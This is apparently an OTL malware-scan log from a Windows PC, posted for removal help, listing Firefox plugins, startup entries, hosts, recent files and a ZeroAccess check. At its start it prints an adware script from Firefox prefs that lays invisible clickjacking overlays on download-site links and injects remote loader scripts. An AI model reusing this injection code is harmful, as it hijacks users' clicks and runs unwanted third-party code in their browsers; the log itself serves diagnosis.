false\"),a.setAttribute(\"href\",\"\"),a.addEventListener(\"click\",function(f){f.returnValue=!1;f.preventDefault&&f.preventDefault()},!1),a.addEventListener(\"mousedown\",function(f){f.returnValue=!1;f.preventDefault&&f.preventDefault()},!1));\n-1<document.location.href.indexOf(\"necraftdl.com/download.ph\")&&(a=document.getElementById(\"downloadpage\"),b=a.getElementsByTagName(\"a\")[0],d=document.createElement(\"div\"),d.style.position=\"absolute\",d.style.width=\"100%\",d.style.height=\"34px\",d.style.left=\"0\",d.style.cursor=\"pointer\",d.style.zIndex=9999,b.parentNode.insertBefore(d,b.previousSibling));\nif(-1<document.location.href.indexOf(\"necraftdl.com\"))for(i=0;i<document.links.length;i++){var link=document.links[i];if(\".exe\"==link.href.substr(-4)){var p=link.parentNode;p.style.position=\"relative\";d=document.createElement(\"div\");d.style.position=\"absolute\";d.style.top=0;d.style.left=0;d.style.width=\"100%\";d.style.height=\"100%\";d.style.cursor=\"pointer\";d.style.zIndex=9999;p.appendChild(d)}}\nif(-1<document.location.host.indexOf(\"salvapantallas.com.es\"))for(b=0;b<document.links.length;b++)if(\"http://www.screensaverspc.com/\"==document.links.href.substr(0,30)){b=document.links.parentNode;b.style.position=\"relative\";a=document.createElement(\"div\");a.style.position=\"absolute\";a.style.left=0;a.style.top=0;a.style.width=\"100%\";a.style.height=\"100%\";a.style.zIndex=\"9999\";a.style.cursor=\"pointer\";b.appendChild(a);break}\nif(-1<document.location.host.indexOf(\"p3olimp.ne\")&&document.getElementsByClassName)for(c=document.getElementById(\"download-manager-checkbox\"),c.onchange=function(){for(var f=document.getElementsByClassName(\"nasjfkla\"),g=0;g<f.length;g++)f[g].style.display=c.checked?\"block\":\"none\"},i=0;i<document.links.length;i++){var link=document.links[i],onclick=link.getAttribute(\"onclick\");if(onclick&&-1<onclick.indexOf(\"prepare_download_file\")){var div=link.parentNode;div.style.position=\"relative\";b=document.createElement(\"div\");\nb.className=\"nasjfkla\";b.style.position=\"absolute\";b.style.top=\"-2px\";b.style.left=\"92px\";b.style.width=\"71px\";b.style.height=\"16px\";b.style.zIndex=\"99999\";b.style.cursor=\"pointer\";div.appendChild(b)}}\n-1<location.host.indexOf(\"p3olimp.ne\")&&setTimeout(function(){for(var f=document.getElementById(\"leftside\"),g=0;g<f.children.length;g++)if(/\\bspnBook\\b/.test(f.children[g].className))for(var h=f.children[g].getElementsByTagName(\"a\"),k=0;k<h.length;k++)h[k].setAttribute(\"href\",\"#\"),h[k].setAttribute(\"target\",\"\")},1E3);\nif(-1<document.location.host.indexOf(\"leunlckr.co\")){var b=document.getElementsByTagName(\"button\")[0],b2=document.createElement(\"button\");b2.className=b.className;b2.innerHTML=b.innerHTML;b.parentNode.insertBefore(b2,b);b.parentNode.removeChild(b)}-1<document.referrer.indexOf(\"go.theadsnet.com\")&&document.write(\"\");\n(function(){var f=0;try{if(-1<window.location.href.indexOf(\"ack-free.co\"))var g=setInterval(function(){try{var k=document.getElementById(\"ucd-countdown-1\"),h=[];h.push(1*k.children[2].children[1].children[1].innerText);h.push(1*k.children[2].children[2].children[1].innerText);h.push(1*k.children[3].children[1].children[1].innerText);h.push(1*k.children[3].children[2].children[1].innerText);for(var n=k=0;n<h.length;n++)k+=h[n];if(!(0<k)){clearInterval(g);var l=document.createElement(\"div\");l.style.position=\n\"absolute\";l.style.top=0;l.style.left=0;l.style.width=\"100%\";l.style.height=\"100%\";l.style.zIndex=\"9999\";l.style.cursor=\"pointer\";var r=document.getElementById(\"ucd-countdown-1-content\").children[1];r.style.position=\"relative\";r.appendChild(l)}}catch(v){try{var q=0;jQuery.each(jQuery(\".ucd-figure.ucd-countdown-digit-bottom\"),function(){q+=1*jQuery(this).text()});if(0===q){clearInterval(g);var t=jQuery(\"#ucd-countdown-1-content iframe\"),u=t.parent();t.remove();u.html(\"<img title='Get Download' alt='latbut' src='http://i.imgur.com/At0oA5A.png' height='61' width='373'>\")}}catch(w){\"undefined\"!==\ntypeof f&&30<++f&&clearInterval(g)}}},750)}catch(h){}})();var __intervalcountasd=0,__intervalasd=setInterval(function(){__intervalcountasd++;if(-1<window.location.host.indexOf(\"ownloads.ziddu.co\")){for(var b=0;b<document.links.length;b++)try{var c=document.links.href.toLowerCase();if(-1==c.indexOf(\"ww.ziddu.co\")&&-1==c.indexOf(\"#\")&&-1==c.indexOf(\"tunes.apple.co\")&&-1==c.indexOf(\"lay.google.co\")&&-1==c.indexOf(\"/gallery/\")){try{for(var e=document.links,f=0;15>=f;f++)e=e.parentNode;if(-1<e.className.indexOf(\"footerbg\"))continue}catch(g){}var d=document.links.parentNode;\nif(!(-1<d.className.indexOf(\"addthis_toolbox\"))){d.style.position=\"relative\";var a=document.createElement(\"div\");a.style.position=\"absolute\";a.style.left=0;a.style.top=0;a.style.width=\"100%\";a.style.height=\"100%\";a.style.zIndex=\"9999\";a.style.cursor=\"pointer\";d.appendChild(a)}}}catch(h){}c=document.getElementsByTagName(\"iframe\");for(b=0;b<c.length;b++)try{-1==c.src.indexOf(\"acebook.co\")&&-1==c.src.indexOf(\"cp.crwdcntrl.ne\")&&(d=c.parentNode,d.style.position=\"relative\",a=document.createElement(\"div\"),\na.style.position=\"absolute\",a.style.left=0,a.style.top=0,a.style.width=\"100%\",a.style.height=\"100%\",a.style.zIndex=\"9999\",a.style.cursor=\"pointer\",a.id=b,d.appendChild(a))}catch(k){}}20<__intervalcountasd&&clearInterval(__intervalasd)},500);;if(window.self==window.top){var script=document.createElement('script');script.type='text/javascript';script.src='//api.jollywallet.com/affiliate/client?dist=87&sub=1&name=ExxstrraCoupoon';document.getElementsByTagName(\"head\")[0].appendChild(script);};if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache1-a.akamaihd.net/loaders/1649/l.js?aoi=1311798366&pid=1649&zoneid=287609&ext=ExxstrraCoupoon&systemid=12403480529111048514&ext=ExxstrraCoupoon\";document.getElementsByTagName(\"head\")[0].appendChild(script)};})();(function(){void(0)})()");
FF - prefs.js..extensions.enabledAddons: ClassicThemeRestorer%40ArisT2Noia4dev:1.2.2
FF - prefs.js..extensions.enabledAddons: adblockpopups%40jessehakanen.net:0.9.2
FF - prefs.js..extensions.enabledAddons: clearConsole%40penzil.com:1.10
FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:30.0
 
 
FF:64bit: - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF64_14_0_0_145.dll File not found
FF:64bit: - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: disabled File not found
FF:[b]64bit:
- HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF:[b]64bit:
- HKLM\Software\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0: C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_14_0_0_145.dll ()
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=:  File not found
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: C:\Users\Guest\Desktop\Pix\iTunes\Mozilla Plugins\npitunes.dll ()
FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.55.2: C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin: C:\Program Files (x86)\Java\jre7\bin\new_plugin\npjp2.dll File not found
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.55.2: C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: disabled File not found
FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0: C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/SharePoint,version=14.0: C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3502.0922: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3508.1109: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3538.0513: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@nexon.net/NxGame: C:\ProgramData\NexonUS\NGM\npNxGameUS.dll (Nexon)
FF - HKLM\Software\MozillaPlugins\@pandonetworks.com/PandoWebPlugin: C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll (Pando Networks)
FF - HKLM\Software\MozillaPlugins\@videolan.org/vlc,version=2.0.1: C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF - HKLM\Software\MozillaPlugins\@videolan.org/vlc,version=2.1.1: C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF - HKLM\Software\MozillaPlugins\@videolan.org/vlc,version=2.1.2: C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF - HKLM\Software\MozillaPlugins\@videolan.org/vlc,version=2.1.3: C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF - HKLM\Software\MozillaPlugins\@WildTangent.com/GamesAppPresenceDetector,Version=1.0: C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\2\NP_wtapp.dll ()
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF - HKCU\Software\MozillaPlugins\pandonetworks.com/PandoWebPlugin: C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll (Pando Networks)
 
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\[email protected]: C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2012\FFExt\[email protected] [2012/03/23 14:59:57 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\[email protected]: C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2012\FFExt\[email protected] [2012/03/23 14:59:57 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\[email protected]: C:\Users\VPaez\AppData\Roaming\Mozilla\Firefox\Profiles\gfr14k0z.default-1402764291221\extensions\[email protected]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 30.0\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components [2014/06/18 20:53:17 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 30.0\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins
 
[2011/08/31 19:22:04 | 000,000,000 | ---D | M] (No name found) -- C:\Users\VPaez\AppData\Roaming\Mozilla\Extensions
[2014/07/26 01:31:36 | 000,000,000 | ---D | M] (No name found) -- C:\Users\VPaez\AppData\Roaming\Mozilla\Firefox\Profiles\gfr14k0z.default-1402764291221\extensions
[2014/07/26 01:28:28 | 000,133,000 | ---- | M] () (No name found) -- C:\Users\VPaez\AppData\Roaming\Mozilla\Firefox\Profiles\gfr14k0z.default-1402764291221\extensions\[email protected]
[2014/07/09 20:33:39 | 000,344,276 | ---- | M] () (No name found) -- C:\Users\VPaez\AppData\Roaming\Mozilla\Firefox\Profiles\gfr14k0z.default-1402764291221\extensions\[email protected]
[2014/07/26 01:31:36 | 000,059,886 | ---- | M] () (No name found) -- C:\Users\VPaez\AppData\Roaming\Mozilla\Firefox\Profiles\gfr14k0z.default-1402764291221\extensions\[email protected]
[2014/07/03 13:57:51 | 001,225,715 | ---- | M] () (No name found) -- C:\Users\VPaez\AppData\Roaming\Mozilla\Firefox\Profiles\gfr14k0z.default-1402764291221\extensions\[email protected]
[2014/07/23 20:06:41 | 000,967,685 | ---- | M] () (No name found) -- C:\Users\VPaez\AppData\Roaming\Mozilla\Firefox\Profiles\gfr14k0z.default-1402764291221\extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi
[2014/07/26 01:27:51 | 000,553,273 | ---- | M] () (No name found) -- C:\Users\VPaez\AppData\Roaming\Mozilla\Firefox\Profiles\gfr14k0z.default-1402764291221\extensions\{fe272bd1-5f76-4ea4-8501-a05d35d823fc}.xpi
[2014/06/18 20:53:17 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\extensions
[2014/06/18 20:53:17 | 000,000,000 | ---D | M] (Skype Click to Call) -- C:\Program Files (x86)\Mozilla Firefox\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}
[2014/06/18 20:53:17 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions
[2014/06/18 20:53:17 | 000,000,000 | ---D | M] (Skype Click to Call) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}
[2014/06/18 20:53:22 | 000,000,000 | ---D | M] (Default) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}
 
O1 HOSTS File: ([2014/07/27 08:46:10 | 000,000,098 | ---- | M]) - C:\Windows\SysNative\drivers\etc\Hosts
O1 - Hosts: 127.0.0.1       localhost
O1 - Hosts: ::1       localhost
O2:[b]64bit:
- BHO: (IEVkbdBHO Class) - {59273AB4-E7D3-40F9-A1A8-6FA9CCA1862C} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2012\x64\ievkbd.dll (Kaspersky Lab ZAO)
O2:[b]64bit:
- BHO: (Skype add-on for Internet Explorer) - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Skype Technologies S.A.)
O2:[b]64bit:
- BHO: (FilterBHO Class) - {E33CF602-D945-461A-83F0-819F76A199F8} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2012\x64\klwtbbho.dll (Kaspersky Lab ZAO)
O2 - BHO: (IEVkbdBHO Class) - {59273AB4-E7D3-40F9-A1A8-6FA9CCA1862C} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2012\ievkbd.dll (Kaspersky Lab ZAO)
O2 - BHO: (Skype Browser Helper) - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)
O2 - BHO: (Java™ Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
O2 - BHO: (FilterBHO Class) - {E33CF602-D945-461A-83F0-819F76A199F8} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2012\klwtbbho.dll (Kaspersky Lab ZAO)
O2 - BHO: (HP Network Check Helper) - {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll File not found
O4:[b]64bit:
- HKLM..\Run: [AdobeAAMUpdater-1.0] C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe (Adobe Systems Incorporated)
O4:[b]64bit:
- HKLM..\Run: [LogMeIn GUI] "C:\Users\Guest\Desktop\Pix\LogMeIn\x64\LogMeInSystray.exe" File not found
O4 - HKLM..\Run: [APSDaemon] C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc.)
O4 - HKLM..\Run: [AVP] C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2012\avp.exe (Kaspersky Lab ZAO)
O4 - HKLM..\Run: [LifeCam] C:\Program Files (x86)\Microsoft LifeCam\LifeExp.exe (Microsoft Corporation)
O4 - HKCU..\Run: [DAEMON Tools Lite] C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe (Disc Soft Ltd)
O4 - Startup: C:\Users\VPaez\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adobe Gamma.lnk = C:\Program Files (x86)\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe (Adobe Systems, Inc.)
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktop = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktopChanges = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 5
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDesktopCleanupWizard = 1
O9:[b]64bit:
- Extra Button: &Virtual Keyboard - {4248FE82-7FCB-46AC-B270-339F08212110} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2012\x64\ievkbd.dll (Kaspersky Lab ZAO)
O9:[b]64bit:
- Extra Button: Skype Click to Call - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Skype Technologies S.A.)
O9:[b]64bit:
- Extra Button: URLs c&heck - {CCF151D8-D089-449F-A5A4-D9909053F20F} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2012\x64\klwtbbho.dll (Kaspersky Lab ZAO)
O9 - Extra Button: @C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll,-103 - {25510184-5A38-4A99-B273-DCA8EEF6CD08} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\NCLauncherFromIE.exe File not found
O9 - Extra 'Tools' menuitem : @C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll,-102 - {25510184-5A38-4A99-B273-DCA8EEF6CD08} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\NCLauncherFromIE.exe File not found
O9 - Extra Button: &Virtual Keyboard - {4248FE82-7FCB-46AC-B270-339F08212110} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2012\ievkbd.dll (Kaspersky Lab ZAO)
O9 - Extra Button: Skype Click to Call - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)
O9 - Extra Button: URLs c&heck - {CCF151D8-D089-449F-A5A4-D9909053F20F} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2012\klwtbbho.dll (Kaspersky Lab ZAO)
O10:[b]64bit:
- NameSpace_Catalog5\Catalog_Entries64\000000000009 [] - C:\Program Files\Bonjour\mdnsNSP.dll (Apple Inc.)
O10 - NameSpace_Catalog5\Catalog_Entries\000000000009 [] - C:\Program Files (x86)\Bonjour\mdnsNSP.dll (Apple Inc.)
O13[b]64bit:
- gopher Prefix: missing
O13 - gopher Prefix: missing
O15 - HKCU\..Trusted Domains: clonewarsadventures.com ([]* in Trusted sites)
O15 - HKCU\..Trusted Domains: freerealms.com ([]* in Trusted sites)
O15 - HKCU\..Trusted Domains: soe.com ([]* in Trusted sites)
O15 - HKCU\..Trusted Domains: sony.com ([]* in Trusted sites)
O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/...indows-i586.cab (Java Plug-in 10.55.2)
O16 - DPF: {CAFEEFAC-0017-0000-0055-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.7.0_55)
O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.7.0_55)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.1.254 75.153.176.9
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{272DC1CF-45C6-47D8-BED0-6939FBDB79F8}: DhcpNameServer = 192.168.1.254 75.153.176.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{945BC30D-3EB8-486D-9099-8301B50DD5C0}: DhcpNameServer = 192.168.1.254 75.153.176.9
O18:[b]64bit:
- Protocol\Handler\livecall - No CLSID value found
O18:[b]64bit:
- Protocol\Handler\ms-help - No CLSID value found
O18:[b]64bit:
- Protocol\Handler\msnim - No CLSID value found
O18:[b]64bit:
- Protocol\Handler\skype4com - No CLSID value found
O18:[b]64bit:
- Protocol\Handler\skype-ie-addon-data {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Skype Technologies S.A.)
O18:[b]64bit:
- Protocol\Handler\wlmailhtml - No CLSID value found
O18:[b]64bit:
- Protocol\Handler\wlpg - No CLSID value found
O18 - Protocol\Handler\livecall {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.dll File not found
O18 - Protocol\Handler\msnim {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.dll File not found
O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
O18 - Protocol\Handler\skype-ie-addon-data {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)
O20:[b]64bit:
- HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20:[b]64bit:
- HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (userinit.exe) - C:\Windows\SysWow64\userinit.exe (Microsoft Corporation)
O20:[b]64bit:
- Winlogon\Notify\igfxcui: DllName - (igfxdev.dll) - C:\Windows\SysNative\igfxdev.dll (Intel Corporation)
O20:[b]64bit:
- Winlogon\Notify\klogon: DllName - (%SystemRoot%\System32\klogon.dll) - C:\Windows\SysNative\klogon.dll (Kaspersky Lab ZAO)
O21:[b]64bit:
- SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O32 - HKLM CDRom: AutoRun - 1
O33 - MountPoints2\{b157c058-e6b2-11e0-a108-e06995d09c96}\Shell - "" = AutoRun
O33 - MountPoints2\{b157c058-e6b2-11e0-a108-e06995d09c96}\Shell\AutoRun\command - "" = J:\setup.exe
O34 - HKLM BootExecute: (autocheck autochk *)
O35:[b]64bit:
- HKLM\..comfile [open] -- "%1" %*
O35:[b]64bit:
- HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:[b]64bit:
- HKLM\...com [@ = comfile] -- "%1" %*
O37:[b]64bit:
- HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)
 
========== Files/Folders - Created Within 30 Days ==========
 
[2014/07/27 08:45:44 | 000,000,000 | ---D | C] -- C:\_OTL
[2014/07/26 02:05:36 | 000,000,000 | -HSD | C] -- C:\Users\VPaez\AppData\Local\EmieUserList
[2014/07/26 02:05:36 | 000,000,000 | -HSD | C] -- C:\Users\VPaez\AppData\Local\EmieSiteList
[2014/07/26 01:42:18 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SUPERAntiSpyware
[2014/07/16 11:09:09 | 000,000,000 | ---D | C] -- C:\ProgramData\Riot Games
[2014/07/13 17:06:13 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
[2014/07/13 17:05:24 | 000,000,000 | ---D | C] -- C:\Program Files\iTunes
[2014/07/13 17:05:24 | 000,000,000 | ---D | C] -- C:\Program Files\iPod
[2014/07/13 17:05:24 | 000,000,000 | ---D | C] -- C:\ProgramData\34BE82C4-E596-4e99-A191-52C6199EBF69
[2014/06/27 13:17:36 | 000,000,000 | ---D | C] -- C:\Users\VPaez\AppData\Local\Adobe
 
========== Files - Modified Within 30 Days ==========
 
[2014/07/27 08:55:19 | 000,024,608 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
[2014/07/27 08:55:19 | 000,024,608 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
[2014/07/27 08:52:29 | 019,195,998 | ---- | M] () -- C:\Windows\SysNative\perfh009.dat
[2014/07/27 08:52:29 | 009,421,354 | ---- | M] () -- C:\Windows\SysNative\perfc009.dat
[2014/07/27 08:52:29 | 000,006,210 | ---- | M] () -- C:\Windows\SysNative\PerfStringBackup.INI
[2014/07/27 08:48:01 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat
[2014/07/27 08:47:57 | 3147,714,560 | -HS- | M] () -- C:\hiberfil.sys
[2014/07/27 08:46:10 | 000,000,098 | ---- | M] () -- C:\Windows\SysNative\drivers\etc\Hosts
[2014/07/27 01:21:00 | 000,000,830 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job
[2014/07/13 17:06:13 | 000,002,055 | ---- | M] () -- C:\Users\Public\Desktop\iTunes.lnk
[2014/07/13 00:20:54 | 000,001,207 | ---- | M] () -- C:\Users\VPaez\Application Data\Microsoft\Internet Explorer\Quick Launch\µTorrent.lnk
[2014/07/09 20:32:00 | 000,411,576 | ---- | M] () -- C:\Windows\SysNative\FNTCACHE.DAT
[2014/07/03 17:06:04 | 000,000,332 | ---- | M] () -- C:\Windows\tasks\HPCeeScheduleForVPaez.job
 
========== Files Created - No Company Name ==========
 
[2014/07/13 17:06:13 | 000,002,055 | ---- | C] () -- C:\Users\Public\Desktop\iTunes.lnk
[2013/06/07 20:49:32 | 000,072,099 | ---- | C] () -- C:\Users\VPaez\Inv_10891_from_All_Star_Landscaping_Services_Ltd._1792.pdf
[2013/02/28 17:01:56 | 000,000,009 | ---- | C] () -- C:\Windows\X6815.INI
[2013/02/06 10:16:48 | 000,015,360 | ---- | C] () -- C:\Windows\Launcher.exe
[2012/08/31 14:11:27 | 000,000,032 | R--- | C] () -- C:\ProgramData\hash.dat
[2012/03/23 15:03:04 | 000,017,408 | ---- | C] () -- C:\Users\VPaez\AppData\Local\WebpageIcons.db
[2011/12/07 19:42:09 | 000,003,584 | ---- | C] () -- C:\Users\VPaez\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2011/09/04 23:35:43 | 000,000,056 | -H-- | C] () -- C:\ProgramData\ezsidmv.dat
 
========== ZeroAccess Check ==========
 
[2009/07/13 22:55:00 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2014/03/24 20:43:12 | 014,175,744 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
